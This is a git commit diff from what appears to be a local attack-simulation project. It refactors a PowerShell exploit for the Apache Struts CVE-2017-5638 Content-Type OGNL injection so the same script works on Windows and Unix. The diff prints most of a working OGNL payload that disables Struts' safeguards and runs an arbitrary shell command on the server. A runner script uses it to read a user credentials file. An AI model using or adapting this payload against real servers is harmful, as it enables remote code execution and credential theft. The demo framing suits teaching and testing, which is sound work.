refactor(script): improve command execution for OS compatibility

AIPEAC · AIPEAC · commit 419ca8d027e0 · 2026-04-14T04:59:16.000+08:00
diff --git a/simulation/attack-script/exploit_cve_2017_5638.ps1 b/simulation/attack-script/exploit_cve_2017_5638.ps1
@@ -226,14 +226,22 @@ if ($DiagLevel -gt 0) {
     #   8. Write output bytes via getOutputStream() + setContentLength +
     #      flushBuffer() to commit the response before JSP rendering.
     #
+    # Select the OS shell that the JVM will spawn.  The JVM runs on the same OS
+    # as the server, so we detect which platform PowerShell is on (they match
+    # in this local-demo scenario) and pick the appropriate shell binary.
+    #   Windows → cmd.exe /c <command>   (no /bin/sh available)
+    #   Linux / macOS → /bin/sh -c <command>
+    $shellExe  = if ($IsWindows) { 'cmd.exe'  } else { '/bin/sh' }
+    $shellFlag = if ($IsWindows) { '/c'       } else { '-c'      }
+
     $escapedCmd = $Command -replace "'", "''"
     $contentType = ".%{" +
         "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +
         "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +
         "(#ognlUtil.getExcludedPackageNames().clear())." +
         "(#ognlUtil.getExcludedClasses().clear())." +
         "(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))." +
-        "(#process=@java.lang.Runtime@getRuntime().exec(new String[]{'/bin/sh','-c','$escapedCmd'}))." +
+        "(#process=@java.lang.Runtime@getRuntime().exec(new String[]{'$shellExe','$shellFlag','$escapedCmd'}))." +
         "(#process.waitFor())." +
         "(#out=new java.lang.String(#process.getInputStream().readAllBytes(),'UTF-8'))." +
         "(#response=@org.apache.struts2.ServletActionContext@getResponse())." +
diff --git a/simulation/attack-script/run.ps1 b/simulation/attack-script/run.ps1
@@ -18,7 +18,11 @@ While ($true) {
         }
         'a' {
             Write-Host "Running attack script - exfiltrating user credentials...`n"
-            & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command "cat data/users.yaml"
+            # Use the OS-native read command so the JVM shell can execute it.
+            #   Windows cmd.exe uses 'type' with backslash paths.
+            #   Linux/macOS sh uses 'cat' with forward-slash paths.
+            $readCmd = if ($IsWindows) { 'type data\users.yaml' } else { 'cat data/users.yaml' }
+            & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command $readCmd
         }
         'd' {
             Write-Host "`n=== DIAGNOSTIC: Running levels 1-6 ===" -ForegroundColor Magenta

Original file line number	Diff line number	Diff line change
`@@ -18,7 +18,11 @@ While ($true) {`
`18`	`18`	`}`
`19`	`19`	`'a' {`
`20`	`20`	Write-Host "Running attack script - exfiltrating user credentials...`n"
`21`		`- & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command "cat data/users.yaml"`
	`21`	`+ # Use the OS-native read command so the JVM shell can execute it.`
	`22`	`+ # Windows cmd.exe uses 'type' with backslash paths.`
	`23`	`+ # Linux/macOS sh uses 'cat' with forward-slash paths.`
	`24`	`+ $readCmd = if ($IsWindows) { 'type data\users.yaml' } else { 'cat data/users.yaml' }`
	`25`	`+ & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command $readCmd`
`22`	`26`	`}`
`23`	`27`	`'d' {`
`24`	`28`	Write-Host "`n=== DIAGNOSTIC: Running levels 1-6 ===" -ForegroundColor Magenta